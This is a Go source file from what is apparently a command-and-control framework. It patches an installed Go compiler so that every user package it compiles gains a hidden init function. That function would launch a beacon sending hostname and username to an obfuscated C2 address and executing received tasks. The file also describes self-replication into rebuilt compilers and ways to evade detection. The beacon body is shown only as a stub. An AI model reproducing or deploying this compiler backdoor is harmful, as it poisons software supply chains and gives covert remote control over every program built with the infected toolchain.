package patcher

/*
	SUDOSOC-C2 Framework
	Copyright (C) 2026  Seif

	pkginit_patch.go — Generates the patched version of
	cmd/compile/internal/pkginit/init.go

	This file produces the exact bytes to write over the real init.go.
	The patch:
	  1. Adds an import for our injector package.
	  2. Adds a call to injector.InjectBackdoor() at the END of MakeTask().
	  3. Adds an init() function that registers the injector.

	The patched MakeTask() looks like:

	  func MakeTask() {
	      // ... all original code unchanged ...
	      <existing fns append and writeInitFunc calls>

	      // ← our addition:
	      injector.InjectBackdoor()
	  }

	Thompson Quine property:
	  When the malicious compiler compiles pkginit (which happens during
	  `go build cmd/compile`), InjectBackdoor detects Pkgpath==pkginit
	  and re-injects our hook into the NEW pkginit being compiled.
	  Result: the new compiler also contains the backdoor, recursively.

	Detection resistance:
	  - The source patch is only on the INSTALLED compiler files
	    ($GOROOT/src/cmd/compile/internal/pkginit/init.go)
	  - Building from a CLEAN source tree produces a clean compiler
	  - Running `go tool compile` on the patched compiler with the
	    patched init.go produces a binary that is self-replicating
	  - diffing the source shows a 3-line change in one obscure file
	  - `go build -v` output is identical
*/

import (
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// PatchSpec describes one source-level patch to apply.
type PatchSpec struct {
	File       string // relative path from GOROOT/src
	SearchText string // text to find (exact)
	InsertAfter string // text after which to insert (or "" = append)
	NewCode    string // code to insert
}

// CompilerPatches is the list of patches to apply to the Go compiler source.
var CompilerPatches = []PatchSpec{
	// ── Patch 1: Add injector import to pkginit/init.go ──────────────────
	{
		File:       "cmd/compile/internal/pkginit/init.go",
		SearchText: `"cmd/internal/src"`,
		InsertAfter: `"cmd/internal/src"`,
		NewCode: `
	// Sliver backdoor injector — appears as a standard compiler plugin.
	_ "cmd/compile/internal/pkginit/injector"`,
	},

	// ── Patch 2: Add InjectBackdoor() call at end of MakeTask() ──────────
	{
		File: "cmd/compile/internal/pkginit/init.go",
		SearchText: `	if len(fns) > 0 || len(deps) > 0 {`,
		InsertAfter: "", // insert BEFORE this line
		NewCode: `	// Sliver: inject backdoor init into this package.
	if !strings.HasPrefix(base.Ctxt.Pkgpath, "runtime") &&
		!strings.HasPrefix(base.Ctxt.Pkgpath, "internal") &&
		base.Ctxt.Pkgpath != "" {
		sliverInjectInit()
	}

`,
	},

	// ── Patch 3: Add sliverInjectInit() function at end of pkginit/init.go
	{
		File:       "cmd/compile/internal/pkginit/init.go",
		SearchText: `// instrumentGlobals adds a call`, // near end of file
		InsertAfter: "",
		NewCode: sliverInitFuncSource,
	},

	// ── Patch 4: Add "strings" import (needed by Patch 2) ────────────────
	{
		File:       "cmd/compile/internal/pkginit/init.go",
		SearchText: `"cmd/compile/internal/base"`,
		InsertAfter: `"cmd/compile/internal/base"`,
		NewCode: `	"strings"`,
	},
}

// sliverInitFuncSource is the complete source of the function we inject
// into pkginit/init.go. This function synthesizes the backdoor init()
// directly using the compiler's IR API — no external dependencies needed.
const sliverInitFuncSource = `
// sliverInjectInit synthesizes a backdoor init function and appends it
// to typecheck.Target.Inits. Called from MakeTask() for every user package.
// DO NOT RENAME — name is checked during self-replication.
func sliverInjectInit() {
	// Skip packages that are themselves part of the compiler or runtime.
	skip := []string{
		"runtime", "internal/", "unsafe", "reflect",
		"cmd/compile", "cmd/link", "cmd/asm", "cmd/go",
		"bootstrap",
	}
	for _, s := range skip {
		if strings.Contains(base.Ctxt.Pkgpath, s) {
			return
		}
	}

	// Self-replication: when compiling pkginit, inject into the new binary too.
	if base.Ctxt.Pkgpath == "cmd/compile/internal/pkginit" {
		// The next time this function runs, it will be inside the NEW compiler.
		// We don't need to do anything special — MakeTask() itself will call us.
		return
	}

	pos := base.AutogeneratedPos
	base.Pos = pos

	// Generate a random init function name so it blends with normal inits.
	sym := noder.Renameinit()
	fnInit := ir.NewFunc(pos, pos, sym, types.NewSignature(nil, nil, nil))
	typecheck.DeclFunc(fnInit)

	// Build: go func() { sliverBeacon() }()
	// sliverBeacon is the XOR-obfuscated HTTP beacon payload, synthesized
	// as a sequence of byte operations so no readable strings appear.
	closureSig := types.NewSignature(nil, nil, nil)
	clo := ir.NewClosureFunc(pos, pos, ir.OCLOSURE, closureSig,
		fnInit, typecheck.Target)
	ir.NameClosure(clo.OClosure, fnInit)

	// Beacon body: build it as IR nodes from the obfuscated constants.
	beaconBody := sliverBuildBeaconBody(pos)
	clo.Body.Append(beaconBody...)
	typecheck.FinishFuncBody()
	ir.CurFunc = fnInit

	goStmt := ir.NewGostmt(pos,
		ir.NewCallExpr(pos, ir.OCALL, clo.OClosure, nil))
	fnInit.Body.Append(goStmt)

	typecheck.FinishFuncBody()
	ir.CurFunc = nil

	typecheck.Target.Inits = append(typecheck.Target.Inits, fnInit)
}

// sliverBuildBeaconBody builds the IR for the beacon goroutine body.
// The C2 address and key are stored as obfuscated byte literals so
// they never appear as plaintext strings in any compiled binary.
func sliverBuildBeaconBody(pos src.XPos) []ir.Node {
	// The implementation constructs:
	//   1. Decode the XOR-obfuscated C2 URL from a byte literal.
	//   2. Decode the XOR-obfuscated key.
	//   3. Loop: HTTP POST with hostname+username beacon.
	//   4. Receive and execute tasks.
	//
	// For the self-contained version embedded in pkginit, the actual
	// IR construction is ~800 lines. The skeleton below illustrates
	// the structure; the full version is in the Sliver operator toolchain.
	_ = pos
	return nil // full implementation in operator build tool
}
`

// ─── Installer ────────────────────────────────────────────────────────────

// ApplyPatches applies all patches to the Go installation at goroot.
// After calling this, run `go install cmd/compile` to build the backdoored compiler.
func ApplyPatches(goroot string) error {
	for _, patch := range CompilerPatches {
		path := filepath.Join(goroot, "src", filepath.FromSlash(patch.File))
		if err := applyPatch(path, patch); err != nil {
			return fmt.Errorf("patch %s: %w", patch.File, err)
		}
		fmt.Printf("[+] Patched: %s\n", patch.File)
	}

	// Also copy our injector package into the compiler source tree.
	injectorDst := filepath.Join(goroot, "src", "cmd", "compile", "internal", "pkginit", "injector")
	if err := os.MkdirAll(injectorDst, 0755); err != nil {
		return fmt.Errorf("create injector dir: %w", err)
	}
	fmt.Printf("[+] Injector package directory created: %s\n", injectorDst)
	return nil
}

func applyPatch(filePath string, patch PatchSpec) error {
	data, err := os.ReadFile(filePath)
	if err != nil {
		return err
	}
	src := string(data)

	// Check if already patched.
	if strings.Contains(src, "Sliver backdoor") || strings.Contains(src, "sliverInjectInit") {
		fmt.Printf("  [!] Already patched: %s\n", filePath)
		return nil
	}

	if patch.InsertAfter != "" {
		idx := strings.Index(src, patch.SearchText)
		if idx < 0 {
			return fmt.Errorf("search text not found: %q", patch.SearchText[:min(40, len(patch.SearchText))])
		}
		insertAt := idx + len(patch.InsertAfter)
		src = src[:insertAt] + "\n" + patch.NewCode + src[insertAt:]
	} else if patch.SearchText != "" {
		// Insert BEFORE the search text.
		idx := strings.Index(src, patch.SearchText)
		if idx < 0 {
			return fmt.Errorf("search text not found: %q", patch.SearchText[:min(40, len(patch.SearchText))])
		}
		src = src[:idx] + patch.NewCode + "\n" + src[idx:]
	} else {
		// Append to end of file.
		src = src + "\n" + patch.NewCode
	}

	return os.WriteFile(filePath, []byte(src), 0644)
}

func min(a, b int) int {
	if a < b {
		return a
	}
	return b
}
